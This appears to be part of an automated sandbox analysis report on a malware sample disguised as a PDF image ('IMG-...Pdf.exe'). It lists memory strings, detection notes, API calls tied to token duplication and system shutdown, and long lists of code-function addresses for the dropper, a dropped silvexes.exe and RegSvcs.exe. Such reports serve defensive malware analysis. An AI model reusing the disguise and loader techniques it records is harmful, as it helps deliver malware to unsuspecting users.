Source: silvexes.exe, 00000004.00000000.1806264290.0000000000C5E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_92d5b09e-3
Source: IMG-20241119-WA0006(162KB).Pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_077df860-7
Source: IMG-20241119-WA0006(162KB).Pdf.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_466c2665-e
Source: silvexes.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5cacd588-a
Source: silvexes.exe.0.dr	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_54cb1551-6

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: IMG-20241119-WA0006(162KB).Pdf.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000C6606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_000C6606

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe

Code function: 0_2_000BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_000BACC5

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_000C79D3
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		1_2_00BF79D3

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000AB043	0_2_000AB043
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00093200	0_2_00093200
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000B410F	0_2_000B410F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A02A4	0_2_000A02A4
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000B038E	0_2_000B038E
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0008E3B0	0_2_0008E3B0
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000B467F	0_2_000B467F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A06D9	0_2_000A06D9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000EAACE	0_2_000EAACE
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000B4BEF	0_2_000B4BEF
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000ACCC1	0_2_000ACCC1
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00086F07	0_2_00086F07
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0008AF50	0_2_0008AF50
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0009B11F	0_2_0009B11F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000E31BC	0_2_000E31BC
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000AD1B9	0_2_000AD1B9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A123A	0_2_000A123A
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000B724D	0_2_000B724D
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C13CA	0_2_000C13CA
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000893F0	0_2_000893F0
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0009F563	0_2_0009F563
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CB6CC	0_2_000CB6CC
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000896C0	0_2_000896C0
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000877B0	0_2_000877B0
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000EF7FF	0_2_000EF7FF
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000B79C9	0_2_000B79C9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0009FA57	0_2_0009FA57
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00089B60	0_2_00089B60
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00093B70	0_2_00093B70
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00087D19	0_2_00087D19
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_0009FE6F	0_2_0009FE6F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000A9ED0	0_2_000A9ED0
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00087FA3	0_2_00087FA3
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_00F5CA68	0_2_00F5CA68
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDB043	1_2_00BDB043
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BC3200	1_2_00BC3200
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BE410F	1_2_00BE410F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD02A4	1_2_00BD02A4
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBE3B0	1_2_00BBE3B0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BE038E	1_2_00BE038E
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD06D9	1_2_00BD06D9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BE467F	1_2_00BE467F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C1AACE	1_2_00C1AACE
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BE4BEF	1_2_00BE4BEF
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDCCC1	1_2_00BDCCC1
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB6F07	1_2_00BB6F07
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BBAF50	1_2_00BBAF50
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BDD1B9	1_2_00BDD1B9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C131BC	1_2_00C131BC
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BCB11F	1_2_00BCB11F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD123A	1_2_00BD123A
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BE724D	1_2_00BE724D
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB93F0	1_2_00BB93F0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF13CA	1_2_00BF13CA
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BCF563	1_2_00BCF563
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFB6CC	1_2_00BFB6CC
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB96C0	1_2_00BB96C0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB77B0	1_2_00BB77B0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00C1F7FF	1_2_00C1F7FF
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BE79C9	1_2_00BE79C9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BCFA57	1_2_00BCFA57
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BC3B70	1_2_00BC3B70
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB9B60	1_2_00BB9B60
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB7D19	1_2_00BB7D19
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BD9ED0	1_2_00BD9ED0
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BCFE6F	1_2_00BCFE6F
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BB7FA3	1_2_00BB7FA3
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_014D8170	1_2_014D8170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529C470	2_2_0529C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529C752	2_2_0529C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05296118	2_2_05296118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529C190	2_2_0529C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529F018	2_2_0529F018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529B328	2_2_0529B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529BEB0	2_2_0529BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05299858	2_2_05299858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05296880	2_2_05296880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529BBD2	2_2_0529BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529CA32	2_2_0529CA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05294AD9	2_2_05294AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529E528	2_2_0529E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529E517	2_2_0529E517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_05293580	2_2_05293580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529B4F2	2_2_0529B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0529F007	2_2_0529F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068304A0	2_2_068304A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06838460	2_2_06838460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06837B70	2_2_06837B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06830040	2_2_06830040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06833870	2_2_06833870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068311C0	2_2_068311C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683CEEB	2_2_0683CEEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683CEF8	2_2_0683CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683F600	2_2_0683F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683F610	2_2_0683F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683C638	2_2_0683C638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683C648	2_2_0683C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683D798	2_2_0683D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683D7A8	2_2_0683D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06830490	2_2_06830490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683E4A0	2_2_0683E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683E4B0	2_2_0683E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683B4D7	2_2_0683B4D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683B4E8	2_2_0683B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683DC00	2_2_0683DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683BD88	2_2_0683BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06837D90	2_2_06837D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683BD98	2_2_0683BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06830D51	2_2_06830D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683ED50	2_2_0683ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06830D60	2_2_06830D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683ED60	2_2_0683ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683CAA0	2_2_0683CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683FA59	2_2_0683FA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683FA68	2_2_0683FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068373D8	2_2_068373D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068373E8	2_2_068373E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683DBF1	2_2_0683DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683D340	2_2_0683D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683D350	2_2_0683D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068308F0	2_2_068308F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683E8F8	2_2_0683E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06830007	2_2_06830007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683E04B	2_2_0683E04B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683E058	2_2_0683E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06833860	2_2_06833860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683F1A9	2_2_0683F1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068311B0	2_2_068311B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683F1B8	2_2_0683F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683C1E0	2_2_0683C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683C1F0	2_2_0683C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06830900	2_2_06830900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683E908	2_2_0683E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683B930	2_2_0683B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0683B940	2_2_0683B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686B6E8	2_2_0686B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06868608	2_2_06868608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686AA58	2_2_0686AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686D670	2_2_0686D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686C388	2_2_0686C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686B0A0	2_2_0686B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686A408	2_2_0686A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686D028	2_2_0686D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06868C60	2_2_06868C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068611A0	2_2_068611A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686C9D8	2_2_0686C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686BD38	2_2_0686BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06865EB8	2_2_06865EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06865EC8	2_2_06865EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686B6D9	2_2_0686B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06868603	2_2_06868603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686560B	2_2_0686560B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06865618	2_2_06865618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686AA48	2_2_0686AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686D663	2_2_0686D663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06865A60	2_2_06865A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06865A70	2_2_06865A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068633A8	2_2_068633A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068633B8	2_2_068633B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06866BC1	2_2_06866BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06866BD0	2_2_06866BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06868BF3	2_2_06868BF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686A3F8	2_2_0686A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06866310	2_2_06866310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06866320	2_2_06866320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06863730	2_2_06863730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06866768	2_2_06866768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06866778	2_2_06866778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686C378	2_2_0686C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686B08F	2_2_0686B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06860488	2_2_06860488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06867497	2_2_06867497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06860498	2_2_06860498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068674A8	2_2_068674A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068628B0	2_2_068628B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068608E0	2_2_068608E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068608F0	2_2_068608F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068678F0	2_2_068678F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06860007	2_2_06860007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06862807	2_2_06862807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06862809	2_2_06862809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686D018	2_2_0686D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06864430	2_2_06864430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06860040	2_2_06860040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06867049	2_2_06867049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06867050	2_2_06867050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686518B	2_2_0686518B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06861191	2_2_06861191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06865198	2_2_06865198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068681A0	2_2_068681A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_068681B0	2_2_068681B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686C9D7	2_2_0686C9D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06867900	2_2_06867900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0686BD28	2_2_0686BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06860D39	2_2_06860D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06860D48	2_2_06860D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06867D48	2_2_06867D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06867D58	2_2_06867D58
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 4_2_0115EC50	4_2_0115EC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01196108	5_2_01196108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119C190	5_2_0119C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119F007	5_2_0119F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119B328	5_2_0119B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119C470	5_2_0119C470
